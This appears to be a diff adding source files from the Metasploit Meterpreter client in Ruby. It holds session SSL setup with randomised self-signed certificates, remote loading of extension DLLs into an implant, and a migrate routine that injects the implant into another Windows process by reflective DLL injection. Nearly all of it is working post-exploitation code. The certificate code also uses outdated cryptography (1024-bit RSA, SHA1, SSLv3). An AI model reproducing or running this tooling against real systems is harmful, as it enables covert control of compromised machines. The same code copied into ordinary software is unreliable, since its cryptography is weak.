+ #
87
+ def cleanup_meterpreter
88
+ ext.aliases.each_value do | extension |
89
+ extension.cleanup if extension.respond_to?( 'cleanup' )
90
+ end
91
+ dispatcher_thread.kill if dispatcher_thread
92
+ end
93
+
94
+ #
95
+ # Initializes the meterpreter client instance
96
+ #
97
+ def init_meterpreter(sock,opts={})
98
+ self.sock = sock
99
+ self.parser = PacketParser.new
100
+ self.ext = ObjectAliases.new
101
+ self.ext_aliases = ObjectAliases.new
102
+ self.alive = true
103
+ self.target_id = opts[:target_id]
104
+ self.capabilities= opts[:capabilities] || {}
105
+
106
+ self.response_timeout = opts[:timeout] || self.class.default_timeout
107
+ self.send_keepalives = true
108
+
109
+
110
+ # Switch the socket to SSL mode and receive the hello if needed
111
+ if capabilities[:ssl] and not opts[:skip_ssl]
112
+ swap_sock_plain_to_ssl()
113
+ end
114
+
115
+ register_extension_alias('core', ClientCore.new(self))
116
+
117
+ initialize_inbound_handlers
118
+ initialize_channels
119
+
120
+ # Register the channel inbound packet handler
121
+ register_inbound_handler(Rex::Post::Meterpreter::Channel)
122
+
123
+ monitor_socket
124
+ end
125
+
126
+ def swap_sock_plain_to_ssl
127
+ # Create a new SSL session on the existing socket
128
+ ctx = generate_ssl_context()
129
+ ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
130
+
131
+ ssl.accept
132
+
133
+ self.sock.extend(Rex::Socket::SslTcp)
134
+ self.sock.sslsock = ssl
135
+ self.sock.sslctx = ctx
136
+
137
+ tag = self.sock.get_once(-1, 30)
138
+ if(not tag or tag !~ /^GET \//)
139
+ raise RuntimeError, "Could not read the HTTP hello token"
140
+ end
141
+ end
142
+
143
+ def swap_sock_ssl_to_plain
144
+ # Remove references to the SSLSocket and Context
145
+ self.sock.sslsock.close
146
+ self.sock.sslsock = nil
147
+ self.sock.sslctx = nil
148
+ self.sock = self.sock.fd
149
+ self.sock.extend(::Rex::Socket::Tcp)
150
+ end
151
+
152
+ def generate_ssl_context
153
+ @@ssl_mutex.synchronize do
154
+ if not @@ssl_ctx
155
+
156
+ wlog("Generating SSL certificate for Meterpreter sessions")
157
+
158
+ key = OpenSSL::PKey::RSA.new(1024){ }
159
+ cert = OpenSSL::X509::Certificate.new
160
+ cert.version = 2
161
+ cert.serial = rand(0xFFFFFFFF)
162
+
163
+ subject = OpenSSL::X509::Name.new([
164
+ ["C","US"],
165
+ ['ST', Rex::Text.rand_state()],
166
+ ["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
167
+ ["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
168
+ ["CN", self.sock.getsockname[1] || Rex::Text.rand_hostname],
169
+ ])
170
+ issuer = OpenSSL::X509::Name.new([
171
+ ["C","US"],
172
+ ['ST', Rex::Text.rand_state()],
173
+ ["L", Rex::Text.rand_text_alpha(rand(20) + 10)],
174
+ ["O", Rex::Text.rand_text_alpha(rand(20) + 10)],
175
+ ["CN", Rex::Text.rand_text_alpha(rand(20) + 10)],
176
+ ])
177
+
178
+ cert.subject = subject
179
+ cert.issuer = issuer
180
+ cert.not_before = Time.now - (3600 * 365) + rand(3600 * 14)
181
+ cert.not_after = Time.now + (3600 * 365) + rand(3600 * 14)
182
+ cert.public_key = key.public_key
183
+ ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
184
+ cert.extensions = [
185
+ ef.create_extension("basicConstraints","CA:FALSE"),
186
+ ef.create_extension("subjectKeyIdentifier","hash"),
187
+ ef.create_extension("extendedKeyUsage","serverAuth"),
188
+ ef.create_extension("keyUsage","keyEncipherment,dataEncipherment,digitalSignature")
189
+ ]
190
+ ef.issuer_certificate = cert
191
+ cert.add_extension ef.create_extension("authorityKeyIdentifier", "keyid:always,issuer:always")
192
+ cert.sign(key, OpenSSL::Digest::SHA1.new)
193
+
194
+ ctx = OpenSSL::SSL::SSLContext.new(:SSLv3)
195
+ ctx.key = key
196
+ ctx.cert = cert
197
+
198
+ ctx.session_id_context = Rex::Text.rand_text(16)
199
+
200
+ wlog("Generated SSL certificate for Meterpreter sessions")
201
+
202
+ @@ssl_ctx = ctx
203
+
204
+ end # End of if not @ssl_ctx
205
+ end # End of mutex.synchronize
206
+
207
+ @@ssl_ctx
208
+ end
209
+
210
+ ##
211
+ #
212
+ # Accessors
213
+ #
214
+ ##
215
+
216
+ #
217
+ # Returns the default timeout that request packets will use when
218
+ # waiting for a response.
219
+ #
220
+ def Client.default_timeout
221
+ return 300
222
+ end
223
+
224
+ ##
225
+ #
226
+ # Alias processor
227
+ #
228
+ ##
229
+
230
+ #
231
+ # Translates unhandled methods into registered extension aliases
232
+ # if a matching extension alias exists for the supplied symbol.
233
+ #
234
+ def method_missing(symbol, *args)
235
+ self.ext_aliases.aliases[symbol.to_s]
236
+ end
237
+
238
+ ##
239
+ #
240
+ # Extension registration
241
+ #
242
+ ##
243
+
244
+ #
245
+ # Loads the client half of the supplied extension and initializes it as a
246
+ # registered extension that can be reached through client.ext.[extension].
247
+ #
248
+ def add_extension(name)
249
+ # Check to see if this extension has already been loaded.
250
+ if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
251
+ old = Rex::Post::Meterpreter::Extensions.constants
252
+ require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
253
+ new = Rex::Post::Meterpreter::Extensions.constants
254
+
255
+ # No new constants added?
256
+ if ((diff = new - old).empty?)
257
+ diff = [ name.capitalize ]
258
+ end
259
+
260
+ klass = Rex::Post::Meterpreter::Extensions.const_get(diff[0]).const_get(diff[0])
261
+
262
+ # Save the module name to class association now that the code is
263
+ # loaded.
264
+ self.class.set_ext_hash(name.downcase, klass)
265
+ end
266
+
267
+ # Create a new instance of the extension
268
+ inst = klass.new(self)
269
+
270
+ self.ext.aliases[inst.name] = inst
271
+
272
+ return true
273
+ end
274
+
275
+ #
276
+ # Deregisters an extension alias of the supplied name.
277
+ #
278
+ def deregister_extension(name)
279
+ self.ext.aliases.delete(name)
280
+ end
281
+
282
+ #
283
+ # Enumerates all of the loaded extensions.
284
+ #
285
+ def each_extension(&block)
286
+ self.ext.aliases.each(block)
287
+ end
288
+
289
+ #
290
+ # Registers an aliased extension that can be referenced through
291
+ # client.name.
292
+ #
293
+ def register_extension_alias(name, ext)
294
+ self.ext_aliases.aliases[name] = ext
295
+ end
296
+
297
+ #
298
+ # Registers zero or more aliases that are provided in an array.
299
+ #
300
+ def register_extension_aliases(aliases)
301
+ aliases.each { |a|
302
+ register_extension_alias(a['name'], a['ext'])
303
+ }
304
+ end
305
+
306
+ #
307
+ # Deregisters a previously registered extension alias.
308
+ #
309
+ def deregister_extension_alias(name)
310
+ self.ext_aliases.aliases.delete(name)
311
+ end
312
+
313
+ #
314
+ # Dumps the extension tree.
315
+ #
316
+ def dump_extension_tree()
317
+ items = []
318
+ items.concat(self.ext.dump_alias_tree('client.ext'))
319
+ items.concat(self.ext_aliases.dump_alias_tree('client'))
320
+
321
+ return items.sort
322
+ end
323
+
324
+ #
325
+ # The extension alias under which all extensions can be accessed by name.
326
+ # For example:
327
+ #
328
+ # client.ext.stdapi
329
+ #
330
+ #
331
+ attr_reader :ext
332
+ #
333
+ # The socket the client is communicating over.
334
+ #
335
+ attr_reader :sock
336
+ #
337
+ # The timeout value to use when waiting for responses.
338
+ #
339
+ attr_accessor :response_timeout
340
+ #
341
+ # Whether to send pings every so often to determine liveness.
342
+ #
343
+ attr_accessor :send_keepalives
344
+ #
345
+ # Whether this session is alive. If the socket is disconnected or broken,
346
+ # this will be false
347
+ #
348
+ attr_accessor :alive
349
+ #
350
+ # The unique target identifier for this payload
351
+ #
352
+ attr_accessor :target_id
353
+ #
354
+ # The libraries available to this meterpreter server
355
+ #
356
+ attr_accessor :capabilities
357
+
358
+ protected
359
+ attr_accessor :parser, :ext_aliases # :nodoc:
360
+ attr_writer :ext, :sock # :nodoc:
361
+ end
362
+
363
+ end; end; end
364
+
@@ -0,0 +1,274 @@
1
+ #!/usr/bin/env ruby
2
+
3
+ require 'rex/post/meterpreter/packet'
4
+ require 'rex/post/meterpreter/extension'
5
+ require 'rex/post/meterpreter/client'
6
+ require 'msf/core/payload/windows'
7
+
8
+ module Rex
9
+ module Post
10
+ module Meterpreter
11
+
12
+ ###
13
+ #
14
+ # This class is responsible for providing the interface to the core
15
+ # client-side meterpreter API which facilitates the loading of extensions
16
+ # and the interaction with channels.
17
+ #
18
+ #
19
+ ###
20
+ class ClientCore < Extension
21
+
22
+ #
23
+ # Initializes the 'core' portion of the meterpreter client commands.
24
+ #
25
+ def initialize(client)
26
+ super(client, "core")
27
+ end
28
+
29
+ ##
30
+ #
31
+ # Core commands
32
+ #
33
+ ##
34
+
35
+ #
36
+ # Loads a library on the remote meterpreter instance. This method
37
+ # supports loading both extension and non-extension libraries and
38
+ # also supports loading libraries from memory or disk depending
39
+ # on the flags that are specified
40
+ #
41
+ # Supported flags:
42
+ #
43
+ # LibraryFilePath
44
+ # The path to the library that is to be loaded
45
+ #
46
+ # TargetFilePath
47
+ # The target library path when uploading
48
+ #
49
+ # UploadLibrary
50
+ # Indicates whether or not the library should be uploaded
51
+ #
52
+ # SaveToDisk
53
+ # Indicates whether or not the library should be saved to disk
54
+ # on the remote machine
55
+ #
56
+ # Extension
57
+ # Indicates whether or not the library is a meterpreter extension
58
+ #
59
+ def load_library(opts)
60
+ library_path = opts['LibraryFilePath']
61
+ target_path = opts['TargetFilePath']
62
+ load_flags = LOAD_LIBRARY_FLAG_LOCAL
63
+
64
+ # No library path, no cookie.
65
+ if (library_path == nil)
66
+ raise ArgumentError, "No library file path was supplied", caller
67
+ end
68
+
69
+ # Set up the proper loading flags
70
+ if (opts['UploadLibrary'])
71
+ load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
72
+ end
73
+ if (opts['SaveToDisk'])
74
+ load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
75
+ end
76
+ if (opts['Extension'])
77
+ load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
78
+ end
79
+
80
+ # Create a request packet
81
+ request = Packet.create_request('core_loadlib')
82
+
83
+ # If we must upload the library, do so now
84
+ if ((load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL)
85
+ image = ''
86
+
87
+ ::File.open(library_path, 'rb') { |f|
88
+ image = f.read
89
+ }
90
+
91
+ if (image != nil)
92
+ request.add_tlv(TLV_TYPE_DATA, image, false, client.capabilities[:zlib])
93
+ else
94
+ raise RuntimeError, "Failed to serialize library #{library_path}.", caller
95
+ end
96
+
97
+ # If it's an extension we're dealing with, rename the library
98
+ # path of the local and target so that it gets loaded with a random
99
+ # name
100
+ if (opts['Extension'])
101
+ library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
102
+ target_path = library_path
103
+ end
104
+ end
105
+
106
+ # Add the base TLVs
107
+ request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
108
+ request.add_tlv(TLV_TYPE_FLAGS, load_flags)
109
+
110
+ if (target_path != nil)
111
+ request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
112
+ end
113
+
114
+ # Transmit the request and wait the default timeout seconds for a response
115
+ response = self.client.send_packet_wait_response(request, self.client.response_timeout)
116
+
117
+ # No response?
118
+ if (response == nil)
119
+ raise RuntimeError, "No response was received to the core_loadlib request.", caller
120
+ elsif (response.result != 0)
121
+ raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
122
+ end
123
+
124
+ return true
125
+ end
126
+
127
+ #
128
+ # Loads a meterpreter extension on the remote server instance and
129
+ # initializes the client-side extension handlers
130
+ #
131
+ # Module
132
+ # The module that should be loaded
133
+ #
134
+ # LoadFromDisk
135
+ # Indicates that the library should be loaded from disk, not from
136
+ # memory on the remote machine
137
+ #
138
+ def use(mod, opts = { })
139
+ if (mod == nil)
140
+ raise RuntimeError, "No modules were specified", caller
141
+ end
142
+ # Get us to the installation root and then into data/meterpreter, where
143
+ # the file is expected to be
144
+ path = ::File.join(Msf::Config.install_root, 'data', 'meterpreter', 'ext_server_' + mod.downcase + ".#{client.binary_suffix}")
145
+
146
+ if (opts['ExtensionPath'])
147
+ path = opts['ExtensionPath']
148
+ end
149
+
150
+ path = ::File.expand_path(path)
151
+
152
+ # Load the extension DLL
153
+ if (load_library(
154
+ 'LibraryFilePath' => path,
155
+ 'UploadLibrary' => true,
156
+ 'Extension' => true,
157
+ 'SaveToDisk' => opts['LoadFromDisk']))
158
+ client.add_extension(mod)
159
+ end
160
+
161
+ return true
162
+ end
163
+
164
+ #
165
+ # Migrates the meterpreter instance to the process specified
166
+ # by pid. The connection to the server remains established.
167
+ #
168
+ def migrate( pid )
169
+ keepalive = client.send_keepalives
170
+ client.send_keepalives = false
171
+ process = nil
172
+ binary_suffix = nil
173
+
174
+ # Load in the stdapi extension if not allready present so we can determine the target pid architecture...
175
+ client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
176
+
177
+ # Determine the architecture for the pid we are going to migrate into...
178
+ client.sys.process.processes.each { | p |
179
+ if( p['pid'] == pid )
180
+ process = p
181
+ break
182
+ end
183
+ }
184
+
185
+ # We cant migrate into a process that does not exist.
186
+ if( process == nil )
187
+ raise RuntimeError, "Cannot migrate into non existant process", caller
188
+ end
189
+
190
+ # We cant migrate into a process that we are unable to open
191
+ if( process['arch'] == nil or process['arch'].empty? )
192
+ raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
193
+ end
194
+
195
+ # And we also cant migrate into our own current process...
196
+ if( process['pid'] == client.sys.process.getpid )
197
+ raise RuntimeError, "Cannot migrate into current process", caller
198
+ end
199
+
200
+ # Create a new payload stub
201
+ c = Class.new( ::Msf::Payload )
202
+ c.include( ::Msf::Payload::Stager )
203
+
204
+ # Include the appropriate reflective dll injection module for the target process architecture...
205
+ if( process['arch'] == ARCH_X86 )
206
+ c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
207
+ binary_suffix = "dll"
208
+ elsif( process['arch'] == ARCH_X86_64 )
209
+ c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
210
+ binary_suffix = "x64.dll"
211
+ else
212
+ raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
213
+ end
214
+
215
+ # Create the migrate stager
216
+ migrate_stager = c.new()
217
+ migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.install_root, "data", "meterpreter", "metsrv.#{binary_suffix}" )
218
+
219
+ payload = migrate_stager.stage_payload
220
+
221
+ # Build the migration request
222
+ request = Packet.create_request( 'core_migrate' )
223
+ request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
224
+ request.add_tlv( TLV_TYPE_MIGRATE_LEN, payload.length )
225
+ request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, payload, false, client.capabilities[:zlib])
226
+ if( process['arch'] == ARCH_X86_64 )
227
+ request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
228
+ else
229
+ request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
230
+ end
231
+
232
+ # Send the migration request (bump up the timeout to 60 seconds)
233
+ response = client.send_request( request, 60 )
234
+
235
+ # Disable the socket request monitor
236
+ client.monitor_stop
237
+
238
+ ###
239
+ # Now communicating with the new process
240
+ ###
241
+
242
+ # Renegotiate SSL over this socket
243
+ client.swap_sock_ssl_to_plain()
244
+ client.swap_sock_plain_to_ssl()
245
+
246
+ # Restart the socket monitor
247
+ client.monitor_socket
248
+
249
+ # Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
250
+ # sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
251
+ # If the platform specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change significantly we will need a better way to do this.
252
+ if( process['arch'] == ARCH_X86_64 )
253
+ client.platform = 'x64/win64'
254
+ client.binary_suffix = 'x64.dll'
255
+ else
256
+ client.platform = 'x86/win32'
257
+ client.binary_suffix = 'dll'
258
+ end
259
+
260
+ # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
261
+ client.ext.aliases.keys.each { |e|
262
+ client.core.use(e)
263
+ }
264
+
265
+ # Restore session keep-alives
266
+ client.send_keepalives = keepalive
267
+
268
+ return true
269
+ end
270
+
271
+ end
272
+
273
+ end; end; end
274
+